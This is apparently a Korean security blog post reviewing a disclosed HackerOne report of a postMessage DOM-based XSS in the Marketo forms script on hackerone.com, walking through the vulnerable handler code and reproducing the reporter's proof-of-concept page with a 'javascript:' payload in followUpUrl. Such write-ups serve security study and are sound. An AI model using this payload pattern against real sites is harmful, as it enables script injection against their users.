postMessage XSS on HackerOne(by adac95) Review

주중에 HackerOne 리포트 뒤적뒤적 찾아보다가 postMessage를 이용한 DOM Base XSS가 있어 공유차 글 작성해봅니다.

https://hackerone.com/reports/398054

postMessage XSS?

postMessage를 이용하면 크로스 도메인간 데이터 송/수신 및 처리가 가능한데, 이 구간에서 사용자 입력에 대한 검증이 부족할 때 XSS 삽입을 할 수 있습니다. 예전에 글 작성해뒀던게 있으니 자세한 내용은 아래 링크에서 참고해주세요~
https://www.hahwul.com/2016/08/web-hacking-html5-postmessage-api.html

postMessage XSS on HackerOne(by adac95)

adac95(Adam)은 이 취약점은 50만원정도(500$) 받았다고 하네요, 보통 XSS 버그바운티 가격선에서 받은 것 같습니다. 뭐 이건 중요한게 아니니 바로 내용을 보시죠.

우선 hackerone.com 내 contact 페이지쪽엔 Marketo forms2.js 가 있습니다. 정확한 기능은 잘 모르겠으나..(제가 분석한건 아니니)

우선 이 자바스크립트에는 PostMessage 처리 구간이 존재합니다. onMessage() 핸들러로 데이터를 전달받아서 처리하게 되는데 mktoReady가 true이면 onReady(), false이면 onResponse 가 호출됩니다.

$(window).on("message", onMessage);
function onMessage (e){
  if(e.originalEvent && e.originalEvent.data){
    var d;
    try {
      d = $.parseJSON(e.originalEvent.data);
    }catch(ex){
      return;
    }
    if(d.mktoReady){
      onReady();
    }else if(d.mktoResponse){
      onResponse(d.mktoResponse)   
    }
  }
}

onResponse에는 mktoResponse의 상태를 보고 error, success로 분기해주는 로직이 있습니다.

function onResponse(mktoResponse){
  var requestId = mktoResponse["for"];
  var request = inflight[requestId];
  if(request){
    if(mktoResponse.error){
      request.error(mktoResponse.data);
    }else{
      request.success(mktoResponse.data);
    }
  }
  delete inflight[requestId];
}

여기서 문제가 되는 부분은 success 분기 구간인데, 인자값으로 받은 데이터에서 url을 뽑아내고, 최종적으로 location.href에 들어가게 됩니다.

var success = function (data){
  if(data.error){
    onError(data);
  }else if(data.formId){
    var u = findCorrectFollowUpUrl(data);
    if(false === onSuccess(values, u)){
      return;
    }
    cookieHelper.removeCookieAllDomains("_mkto_purl");
    location.href = u;
  }
}

이 과정중에선 Js단에서 인자값에 대한 Escape 처리 등이 없었고, javascript: , data: 등의 구문이 들어오게 되며 그대로 스크립트로 실행하여 처리하게 될겁니당.
순서를 보면..

onResponse => request.success => data.err(에러 아닐 때 ) => location.href={User-Input}

PoC

결국 postMessage로 공격코드가 포함된 mktoResponse를 전달해주면 트리거됩니다.

<!DOCTYPE html>
<html>
    <head>
        <title>Hackerone PostMessage XSS</title>
    </head>
    <body>
        <p>You want to contact Hackerone! Click this button and submit the form!</p>
        <button id="openH1">Click Here</button>
        <script>
            var h1Win;

            function openWin(){
                h1Win = window.open("https://www.hackerone.com/#contact/");
                setInterval(sendMessage, 250);
            }

            function sendMessage(){
                h1Win.postMessage('{"mktoResponse":{"for":"mktoFormMessage0","error":false,"data":{"formId":"1013","followUpUrl":"javascript:alert(document.domain);//","aliId":17144124}}}',"*");
            }

            document.getElementById("openH1").addEventListener('click', openWin);
        </script>
    </body>
</html>

hackerone.com에서는 아래와 같은 포맷으로 데이터를 받았을테고, 결국 followUpUrl을 따라서 javascript 구문이 동작하게 됩니다.

{"mktoResponse":{"for":"mktoFormMessage0","error":false,"data":{"formId":"1013","followUpUrl":"javascript:alert(document.domain);//","aliId":17144124}}}

https://hackerone.com/reports/398054

Conclusion

솔직히 postMessage 구간은 신경쓰지 않으면 눈에 굉장히 안들어오긴 합니다.
(모든 페이지에서 postMesage가 사용되는지 체크, 검증하기엔 좀 그렇죠. 해도 ZAP/Burp Extension 등으로 해야 그나마 나을듯요)

전에 내용으로만 정리한게 실제로 나와주니 좀 반갑긴하네요..
(물론 예전 글 썼던 2016년쯤, 일하다가 한번 저걸로 찾은적이 있긴합니다. 그게 처음이자 마지막이였네요…ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ)

그나저나 전 버그바운티 하기 왜이리 귀찮을까요... 손이 안가네요

media0.giphy.com/media/NWg7M1VlT101W/giphy.gif

Reference

https://hackerone.com/reports/398054
https://www.hahwul.com/2016/08/web-hacking-html5-postmessage-api.html

---

HAHWUL Security engineer, Gopher and H4cker!